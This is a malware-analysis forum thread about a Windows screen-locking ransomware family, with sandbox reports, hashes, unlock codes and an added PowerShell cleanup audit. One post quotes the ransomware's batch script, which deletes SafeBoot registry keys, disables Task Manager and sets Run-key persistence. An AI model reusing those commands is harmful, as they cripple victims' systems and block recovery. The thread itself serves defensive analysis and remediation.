A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18067  by Buster_BSA
 Wed Feb 06, 2013 6:10 pm
EP_X0FF wrote: Attached sample downloaded before server block.
codfullhdxavi.exe is now detected as Trojan:Win32/LockScreen.AO
 Report generated with Buster Sandbox Analyzer 1.87 at 19:08:55 on 06/02/2013

 [ General information ]
   * Analysis duration: 00:00:15
   * File name: c:\m\test\codfullhdxavi.exe
   * File length: 1738240 bytes
   * File signature (PEiD): PureBasic 4.x -> Neil Hodgson *
   * File signature (Exeinfo): *** Unknown EXE  - Checksum is Set -  Std Compiler section  [DebuG]
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 7.99646 (99.9558%)
   * ssdeep signature: 49152:muTQnzVZm8qkgjKb2zrgy1B4yE/eGh0RF2NPwwg:J4zK7kKSUgy1Ch0K
   * Adobe Malware Classifier: Unknown
   * Digital signature: Unsigned
   * MD5 hash: cc7285b763449cf42ea3bcad37aa76fb
   * SHA1 hash: f128e0cd6ee65efd2a9673f3a1cb2d745688b709
   * SHA256 hash: 763d064c10fdc3a22b31197ed47f6093fbb1409ab899afa630e62330277b24aa

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Creates value "Shell=C:\M\TEST\codfullhdxavi.EXE" in key HKEY_CURRENT_USER\software\Microsoft\Windows NT\CurrentVersion\Winlogon
              binary data=43003A005C004D005C0054004500530054005C0063006F006400660075006C006C006800640078006100760069002E004500580045000000

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Gets input locale identifiers.
   * Checks for debuggers.
   * Installs a hook procedure that monitors keystroke messages.
   * Locks screen.
 #18800  by EP_X0FF
 Mon Apr 01, 2013 6:19 pm
Unlock code: 44650

Detection ratio: 1 / 46

SHA256: 83b1aa77cd921502a4b7e5189557742fff67cfe91c1fb682e093921c0b817f23
SHA1: 7ed6cb0573dced301b09709fe9932a6b99cec85a
MD5: b5e041c8724bdbd39d950fca8de87e28

https://www.virustotal.com/en/file/83b1 ... 364839482/
Attachments
pass: infected
 #19126  by EP_X0FF
 Wed May 01, 2013 3:19 am
Source was sold (http://blog.webroot.com/2013/04/30/mana ... -the-wild/) to someone and here is the first "remake".

SHA256: 898c2aa263fe5ac88fe42e879357039d1b11685a43cd14c7e6706051106fddf5
SHA1: c5fb4da2664b2af95102e068573e7c1b55405399
MD5: 3cd2797acfa7f167b245b66d4164ebb2

https://www.virustotal.com/en/file/898c ... 367377183/

Unblock code: 643271749
Warning: the original script-kiddie author's source was bugged and this ransomware is bugged even more: it will NOT remove itself even after entering the correct unblock code. Due to the high impact this malware has on the system (replaces system files, deletes all registry entries related to Safe Mode), additional recovery steps are required.

Runs from:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run as Sound c:\windows\sound.bat

X:\Documents and Settings\UserName\Start Menu\Programs\Startup (where X represents the system drive)
random_name = path to exe
random_name = path to bat (see below)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run as
random_name = path to exe
random_name = path to bat (see below)

Renames taskmgr.exe to mdsdba.dll (this triggers WFP).

Masterpiece from this malware:
@echo off
taskkill /f /im explorer.exe
@echo off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
@echo off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
copy %0 %windir%\Win32.bat > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run
/v Win32 /t REG_SZ /d %windir%\Win32.bat /f
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
@echo off
Title Sound
start Sound.exe
/facepalm.
Attachments
pass: infected
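The two posts above describe the same family of artifacts: a hijacked Winlogon Shell value, Run-key and Startup-folder entries for a .bat, a DisableTaskMgr policy, the deleted SafeBoot key and a renamed taskmgr.exe. The following PowerShell is an added defender-side audit written for this thread, not code from the posts or the malware; the -Fix switch name and the "clean host export" advice for SafeBoot are my assumptions.

```powershell
# Added defender-side check, not code from the thread: audit the persistence and
# lockdown artifacts described in the posts above and optionally undo them.
# -Fix is an assumed switch; run as the affected user, elevated for the HKLM parts.
param([switch]$Fix)

$findings = @()
# 1. Winlogon Shell hijack (sandbox report above): anything other than explorer.exe is suspect.
$wl = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
$shell = (Get-ItemProperty -Path $wl -Name Shell -ErrorAction SilentlyContinue).Shell
if ($shell -and $shell -ne 'explorer.exe') {
    $findings += "Winlogon Shell = $shell"
    if ($Fix) { Remove-ItemProperty -Path $wl -Name Shell }  # HKLM default then applies
}

# 2. Run keys and Startup folder entries that launch a .bat (sound.bat / Win32.bat).
#    Entries with a random name pointing at the exe still need a manual look.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($k in $runKeys) {
    $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }        # skip PSPath/PSChildName metadata
        if ("$($p.Value)" -match '\.bat(\s|"|$)') {
            $findings += "$k\$($p.Name) = $($p.Value)"
            if ($Fix) { Remove-ItemProperty -Path $k -Name $p.Name }
        }
    }
}
Get-ChildItem ([Environment]::GetFolderPath('Startup')) -Filter *.bat -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "Startup: $($_.FullName)"; if ($Fix) { Remove-Item $_.FullName } }

# 3. DisableTaskMgr policy that the batch file sets.
$pol = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
$dtm = (Get-ItemProperty -Path $pol -Name DisableTaskMgr -ErrorAction SilentlyContinue).DisableTaskMgr
if ($dtm -eq 1) {
    $findings += 'DisableTaskMgr = 1'
    if ($Fix) { Remove-ItemProperty -Path $pol -Name DisableTaskMgr }
}

# 4. SafeBoot key deleted: rebuilding it needs an export from a clean host of the same
#    build, so this only reports. 5. taskmgr.exe renamed: let WFP/SFC restore it.
$sb = 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot'
foreach ($sub in 'Minimal', 'Network') {
    if (-not (Test-Path "$sb\$sub")) { $findings += "SafeBoot\$sub missing (import from clean host)" }
}
if (-not (Test-Path "$env:windir\System32\taskmgr.exe")) { $findings += 'taskmgr.exe missing (sfc /scannow)' }

if ($findings) { $findings | ForEach-Object { Write-Output "FOUND: $_" } } else { Write-Output 'No LockScreen artifacts found' }
```

Run it without -Fix first to see what it would touch; the Winlogon and Policies values are per-user, so repeat for each affected profile.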
 #20624  by EP_X0FF
 Wed Aug 28, 2013 3:43 pm
FUD

SHA256: c622e4e8a33d2253448cc462bccd308a5a74805ed324f72c47fce0eb04fc9366
SHA1: 24e8a307628ca4bc0db57f79c545ff6d91e7a005
MD5: ba8b9fb7432560fa4978754c3bbd90b6

https://www.virustotal.com/en/file/c622 ... 377704196/

Drop zone hxxp://besthdvids.ru/

Decrypted (runpe)
https://www.virustotal.com/en/file/2144 ... 377704409/

Code to unlock Windows: 83630
Attachments
pass: infected
pass: infected
 #21536  by patriq
 Mon Dec 02, 2013 9:06 pm
Kafeine wrote: Maybe not related to this thread... sorry if so.

Pushed in GrandSoft Exploit Kit in Russia for weeks:
(screenshot)
Design:
(screenshot)

e1344f814885baeef6af0d2e8993811c

Some thoughts on the phone number included. Typical ransomware would have the victim buy uKash or something like that. Can anyone translate the message?

+7 964 987 8567
A phone number in Russia.
+7 is the international calling code for RU.
Prefix 964 appears to be 'new', as in it is not on legacy listings for carriers.
Maybe a mobile pre-paid or SIP provider?

Not sure why this info can't be used to catch this fucker... oh yeah, it's Russia. :roll:
 #22714  by ada101
 Tue Apr 22, 2014 2:06 pm
patriq wrote: Can anyone translate the message?
Google Translate results in the following:
(screenshot of the translated message)
Not very good, but it gets the message across.